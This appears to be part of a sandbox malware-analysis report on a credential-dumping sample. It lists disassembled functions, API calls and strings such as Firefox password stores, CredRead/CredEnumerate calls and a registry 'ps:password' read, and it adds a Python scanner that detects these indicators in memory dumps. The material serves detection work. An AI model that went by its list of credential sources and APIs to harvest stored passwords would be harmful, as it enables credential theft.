                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                          • API String ID: 710961058-601624466
                                                                                                                                                                                                          • Opcode ID: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                                                                                                                                                                                          • Instruction ID: 74eb9a4e80b6148bc8e6745fd37c56fddd23ac0c0a2d0b32ddfd32f18a43723b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC61B232900214AFEF14EF64CC81EDE7B79EF05314F10419AF905AB1D2DB749A55CB55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                          • API String ID: 3402215030-3842416460
                                                                                                                                                                                                          • Opcode ID: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
                                                                                                                                                                                                          • Instruction ID: 369df5ceca9bdb9f61db2c44a96b4e719fee50907ea6fa1c749cf0cc9e3d70a7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC4176B684011DAEEB11EE54DC41FEB776CAF55305F0401EBB608E2142E7789F988FA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                                          • String ID: %s mode not allowed: %s$BINARY$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                                          • API String ID: 231171946-1411472696
                                                                                                                                                                                                          • Opcode ID: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                                                                                                                                                                                          • Instruction ID: 52e3131474fa5b42b7a716d11f9a5693575ad96a685679239bae0d8a086cc604
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6ED13571D40209AAFF24CF99C8807EFBBB1AF15349F24405FE84197361E3789AC68B59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$lD
                                                                                                                                                                                                          • API String ID: 1012775001-1916105108
                                                                                                                                                                                                          • Opcode ID: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
                                                                                                                                                                                                          • Instruction ID: 0f0ca2c9629047d536013ad0a00a476c63862c7e4230734d296e8a5f64e20069
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41415A72940118ABDB20DB54CC88FDAB7BCAB59300F4541EAF50DE7192DA74AA858FA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%
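The String IDs recovered from the process 5 image above (the `/noloadsettings` and `report.html` UI strings, the `sprintf`-built HTML table templates, the `.cfg` keys `AddExportHeaderLine`, `MarkOddEvenRows`, `SaveFilterIndex`, `ShowGridLines`, and the SQLite URI-parser messages such as `no such vfs: %s`) are the artefacts an analyst would carry into memory triage of other hosts, which matches the report's "Yara detected WebBrowserPassView password recovery tool" signature. The scanner below is an added example for this page, not Joe Sandbox code and not code from the sample; it searches a dump for those strings in both ASCII and UTF-16LE, groups them by the function that references them, and scores on how many groups co-occur. The group labels, the scoring rule and the threshold are my own assumptions, and the dump it runs on is a constructed buffer, not a real memory image.

```python
"""Scan a memory dump for the string artefacts listed in the function blocks above.

Added example for this report; not Joe Sandbox code. The indicator strings are
copied from the 'String ID' fields of the function blocks (process 5, image
base 0x400000). Group names, scoring and threshold are an analyst's assumption.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Strings from the function blocks above, grouped by what the referencing code
# does (from its API list). Group labels are an assumption, not report data.
INDICATOR_GROUPS: dict[str, list[str]] = {
    # CreateWindowExA("SysListView32"), GetTempPathA, then "report.html"
    "report_ui": ["/noloadsettings", "SysListView32", "commdlg_FindReplace", "report.html"],
    # sprintf-based HTML report writer
    "html_report": ['<table border="1" cellpadding="5">', '<font color="%s">%s</font>',
                    'bgcolor="%s"', "</table><p>"],
    # .cfg settings keys located via GetModuleFileName + strrchr
    "cfg_keys": [".cfg", "AddExportHeaderLine", "MarkOddEvenRows",
                 "SaveFilterIndex", "ShowGridLines", "WinPos"],
    # SQLite URI-parser errors: browser credential stores are SQLite databases
    "sqlite_uri": ["no such vfs: %s", "invalid uri authority: %.*s",
                   "%s mode not allowed: %s", "no such %s mode: %s"],
}


@dataclass
class Hit:
    group: str
    needle: str
    offset: int
    encoding: str  # "ascii" or "utf-16le"


@dataclass
class ScanResult:
    hits: list[Hit] = field(default_factory=list)

    def groups_seen(self) -> set[str]:
        return {h.group for h in self.hits}

    def score(self) -> int:
        # One point per indicator group present (weighting is an assumption).
        return len(self.groups_seen())


def scan_dump(data: bytes) -> ScanResult:
    """Find every indicator in ASCII and UTF-16LE, recording offset and encoding."""
    result = ScanResult()
    for group, needles in INDICATOR_GROUPS.items():
        for needle in needles:
            for enc in ("ascii", "utf-16le"):
                pattern = re.escape(needle.encode(enc))
                for m in re.finditer(pattern, data):
                    result.hits.append(Hit(group, needle, m.start(), enc))
    return result


def classify(result: ScanResult, threshold: int = 3) -> str:
    """Verdict. The threshold is an assumption: three of the four groups
    co-occurring in one process image is unlikely for ordinary software."""
    if result.score() >= threshold:
        return "nirsoft-style credential dumper (likely)"
    return "inconclusive"


def build_sample_dump() -> bytes:
    """Constructed test buffer, not a real dump: filler with a few indicators
    embedded, one of them UTF-16LE so the encoding handling is exercised."""
    filler = b"\x00" * 64 + b"MZ\x90\x00" + b"\xcc" * 200
    return (filler
            + b"/noloadsettings\x00" + filler
            + b"SysListView32\x00" + filler
            + '<table border="1" cellpadding="5">'.encode("ascii") + filler
            + "MarkOddEvenRows".encode("utf-16le") + filler
            + b"no such vfs: %s\x00" + filler)


if __name__ == "__main__":
    res = scan_dump(build_sample_dump())
    for h in sorted(res.hits, key=lambda h: h.offset):
        print(f"{h.offset:#010x} {h.group:<12} {h.encoding:<9} {h.needle!r}")
    print("groups:", sorted(res.groups_seen()), "verdict:", classify(res))
```

Run it against a `.sdmp`/`.dmp` of a suspect process by replacing `build_sample_dump()` with the file's bytes. The SQLite strings on their own are not an indicator (any SQLite-linked program carries them); that is why the verdict requires several groups to co-occur rather than any single match.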

APIs
  • Part of subcall function 004078B8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040EAAB,?,?,?,?), ref: 004078D1
  • Part of subcall function 004078B8: CloseHandle.KERNEL32(00000000,?,?,?), ref: 004078FD
  • Part of subcall function 004045BD: ??3@YAXPAX@Z.MSVCRT ref: 004045C4
  • Part of subcall function 00406DD3: _mbscpy.MSVCRT ref: 00406DD8
  • Part of subcall function 00406DD3: strrchr.MSVCRT ref: 00406DE0
  • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D80B
  • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D81F
  • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D833
  • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D900
  • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D960
• strlen.MSVCRT ref: 0040EAF0
• strlen.MSVCRT ref: 0040EAFE
• memset.MSVCRT ref: 0040EB3F
• strlen.MSVCRT ref: 0040EB4E
• strlen.MSVCRT ref: 0040EB5C
• memset.MSVCRT ref: 0040EB9D
• strlen.MSVCRT ref: 0040EBAC
• strlen.MSVCRT ref: 0040EBBA
• _strcmpi.MSVCRT ref: 0040EC68
• _mbscpy.MSVCRT ref: 0040EC83
  • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
  • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98

Strings

Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd

Similarity
• API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_strcmpistrrchr
• String ID: logins.json$none$signons.sqlite$signons.txt
• API String ID: 3884059725-3138536805
• Opcode ID: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
• Instruction ID: df88ffc6541641ac30fc10f5b0fca58fec5c07c4b1c9a15943a758993f488c50
• Opcode Fuzzy Hash: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
• Instruction Fuzzy Hash: 2D512971508209AEE714EB62DC85BDAB7ECAF11305F10057BE145E20C2EF79B6648B99

Uniqueness
Uniqueness Score: -1.00%

APIs

Strings

Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd

Similarity
• API ID: _strcmpi
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 1439213657-1959339147
• Opcode ID: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
• Instruction ID: 4795e8c1a20e30d0c9bbc9b6431cc8fe1bf434ed6b151c21ba544f3180274443
• Opcode Fuzzy Hash: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
• Instruction Fuzzy Hash: 89012C6328A71168F93822A63C07F931A88CBD2B3BF32021FFA04E40C4EE5D9014946E

Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00443AF6
  • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
• strlen.MSVCRT ref: 00443B12
• memset.MSVCRT ref: 00443B4C
• memset.MSVCRT ref: 00443B60
• memset.MSVCRT ref: 00443B74
• memset.MSVCRT ref: 00443B9A
  • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
  • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
• memcpy.MSVCRT ref: 00443BD1
  • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
  • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
• memcpy.MSVCRT ref: 00443C0D
• memcpy.MSVCRT ref: 00443C1F
• _mbscpy.MSVCRT ref: 00443CF6
• memcpy.MSVCRT ref: 00443D27
• memcpy.MSVCRT ref: 00443D39

Strings

Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd

Similarity
• API ID: memcpymemset$strlen$_mbscpy
• String ID: salu
• API String ID: 3691931180-4177317985
• Opcode ID: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
• Instruction ID: ac1bd25895dca9443f5d295c1451dfd6054ecd25aeec11951aea85171a240119
• Opcode Fuzzy Hash: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
• Instruction Fuzzy Hash: E1715F7290011DAADB10EFA5CC81ADEB7BDBF08348F1405BAF648E7191DB749B488F95

Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(psapi.dll,?,0040F791), ref: 0040F9BF
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040F9D8
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040F9E9
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040F9FA
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040FA0B
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040FA1C
• FreeLibrary.KERNEL32(00000000), ref: 0040FA3C

Strings

Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd

Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
• API String ID: 2449869053-232097475
• Opcode ID: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
• Instruction ID: b0622ab91b6b15bab8cd8e6e0f6310f6235a52dd738245c008a901a401bb443a
• Opcode Fuzzy Hash: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
• Instruction Fuzzy Hash: C6017574A41315ABDB31DB256D41F6B2DE49786B41B100037F808F16A5E7B8D806CF6D

Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403EBB
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403ECF
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403EE3
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F04
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00403F20
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F57
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F88
Strings
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F82
• <table dir="rtl"><tr><td>, xrefs: 00403F1A
• <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F32
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403EFE
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E93
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memsetsprintf$FileWrite_mbscpystrlen
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
• API String ID: 113626815-1670831295
Uniqueness
Uniqueness Score: -1.00%

APIs
• sprintf.MSVCRT ref: 004092EC
• LoadMenuA.USER32(?,?), ref: 004092FA
  • Part of subcall function 00409123: GetMenuItemCount.USER32(?), ref: 00409138
  • Part of subcall function 00409123: memset.MSVCRT ref: 00409159
  • Part of subcall function 00409123: GetMenuItemInfoA.USER32 ref: 00409194
  • Part of subcall function 00409123: strchr.MSVCRT ref: 004091AB
• DestroyMenu.USER32(00000000), ref: 00409318
• sprintf.MSVCRT ref: 0040935C
• CreateDialogParamA.USER32(?,00000000,00000000,004092C6,00000000), ref: 00409371
• memset.MSVCRT ref: 0040938D
• GetWindowTextA.USER32(00000000,?,00001000), ref: 0040939E
• EnumChildWindows.USER32(00000000,Function_00009213,00000000), ref: 004093C6
• DestroyWindow.USER32(00000000), ref: 004093CD
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
• String ID: caption$dialog_%d$menu_%d
• API String ID: 3259144588-3822380221
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F798), ref: 0040F937
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040F950
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040F961
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040F972
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040F983
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040F994
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00404651: FreeLibrary.KERNEL32(?,004045DE,?,0040F07D,?,00000000), ref: 00404658
• LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
• GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
• GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
• GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
• GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
• GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
• API String ID: 2449869053-4258758744
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
• memset.MSVCRT ref: 0040F1BF
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F1EC
• RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F215
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F28E
• LocalFree.KERNEL32(?), ref: 0040F2A1
• RegCloseKey.ADVAPI32(?), ref: 0040F2AC
• RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
• RegCloseKey.ADVAPI32(?), ref: 0040F2D4
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
• String ID: Creds$ps:password
• API String ID: 551151806-1872227768
Uniqueness
Uniqueness Score: -1.00%

APIs
• wcsstr.MSVCRT ref: 0040424C
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404293
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042A7
• _mbscpy.MSVCRT ref: 004042B7
• _mbscpy.MSVCRT ref: 004042CA
• strchr.MSVCRT ref: 004042D8
• strlen.MSVCRT ref: 004042EC
• sprintf.MSVCRT ref: 0040430D
• strchr.MSVCRT ref: 0040431E
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
• String ID: %s@gmail.com$www.google.com
• API String ID: 3866421160-4070641962
                                                                                                                                                                                                          • Opcode ID: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                                                                                                                                                                                          • Instruction ID: 638e790b5603b8fd8804fb5d4b15941c8435a10b684d18614d662d2844f21a3d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A53195B290421CBFEB11DB91DC81FDAB36CEB44314F1005A7F708F2181DA78AF558A59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004094BA
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004094CA
                                                                                                                                                                                                            • Part of subcall function 0040907D: memset.MSVCRT ref: 004090A2
                                                                                                                                                                                                            • Part of subcall function 0040907D: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,?,00001000,00451200), ref: 004090C6
                                                                                                                                                                                                            • Part of subcall function 0040907D: WritePrivateProfileStringA.KERNEL32(00451308,?,?,00451200), ref: 004090DD
                                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,00000004,Function_000092CB,00000000), ref: 00409500
                                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,00000005,Function_000092CB,00000000), ref: 0040950A
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00409512
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040952E
                                                                                                                                                                                                          • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409542
                                                                                                                                                                                                            • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                                          • API String ID: 1035899707-3647959541
                                                                                                                                                                                                          • Opcode ID: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                                                                                                                                                                                          • Instruction ID: 9dc8dfcbefe26b31ead3ecdd6c1d49ac828ce4ba7b4c08f8d1d1c72bb5e2ee9a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6112B7190025476F73127169C06FDB3E5CDF86B96F00407BBB08B61D3C6B94D40866D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscpy
                                                                                                                                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                          • API String ID: 714388716-318151290
                                                                                                                                                                                                          • Opcode ID: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                                                                          • Instruction ID: 9896847eb90bf5c4294a3c9dccddd80cbc36a64f1d49de08ffe9e6d9729d10b2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CF054B1BA870D60343C0528088EAF715009463B453764627F222E05DECEEDBCD26C0F
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0040C7C9
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 0040C7D7
                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0040C7EC
                                                                                                                                                                                                          • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C821
                                                                                                                                                                                                          • SelectObject.GDI32(00000014,?), ref: 0040C82D
                                                                                                                                                                                                            • Part of subcall function 0040C586: GetCursorPos.USER32(?), ref: 0040C593
                                                                                                                                                                                                            • Part of subcall function 0040C586: GetSubMenu.USER32(?,00000000), ref: 0040C5A1
                                                                                                                                                                                                            • Part of subcall function 0040C586: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C5CE
                                                                                                                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040C84E
                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0040C855
                                                                                                                                                                                                          • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040C877
                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040C8B2
                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040C92B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1416211542-0
                                                                                                                                                                                                          • Opcode ID: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                                                                          • Instruction ID: 09ccc7060a79f4adaf8e2edad657e89b5ff3622033c15eab8e38028839dfd0e9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E518276200605EFCB15AF64CCC5AAA77A5FB08302F004636F616B72A1CB39A951DB9D
